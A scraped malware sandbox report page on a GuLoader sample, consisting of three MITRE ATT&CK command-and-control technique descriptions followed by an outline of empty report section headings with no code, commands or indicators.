Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Fec9qUX4at.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers